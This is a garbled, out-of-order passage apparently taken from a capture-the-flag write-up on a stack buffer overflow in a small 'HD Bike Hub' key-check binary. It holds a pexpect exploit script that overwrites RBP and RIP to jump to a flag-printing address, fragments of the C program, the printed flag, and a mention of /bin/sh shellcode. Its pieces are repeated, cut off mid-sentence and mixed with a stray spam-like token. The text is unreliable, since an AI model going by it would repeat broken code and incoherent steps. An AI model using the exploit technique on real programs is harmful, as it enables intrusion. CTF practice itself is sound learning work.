puts(flag); return 0;
def main(): p = pexpect.spawn(BIN, encoding='utf-8') p.expect("Enter your hub key:") # build payload payload = b'A' * 64 # fill buffer payload += b'B' * 8 # overwrite saved RBP payload += struct.pack("<Q", TARGET_ADDR) # overwrite RIP hdhub4ubike
// compare with a secret stored in the .rodata section if (strcmp(key, secret_key) != 0) return 0; puts(flag); return 0; def main(): p = pexpect
if (check_key(buf) == 0) puts("Invalid key!"); exit(1); If you prefer a “classic” shellcode approach, you
Therefore we want our to be 0x004011a6 . 3.2 Crafting the payload The stack layout (simplified) at the moment of the overflow:
=== Welcome to the HD Bike Hub === Enter your hub key: flagh0p3_y0u_f0und_th3_h1d3_b1k3 Success! The flag is printed without ever passing the check_key test. If you prefer a “classic” shellcode approach, you can place a /bin/sh payload on the stack and return to it.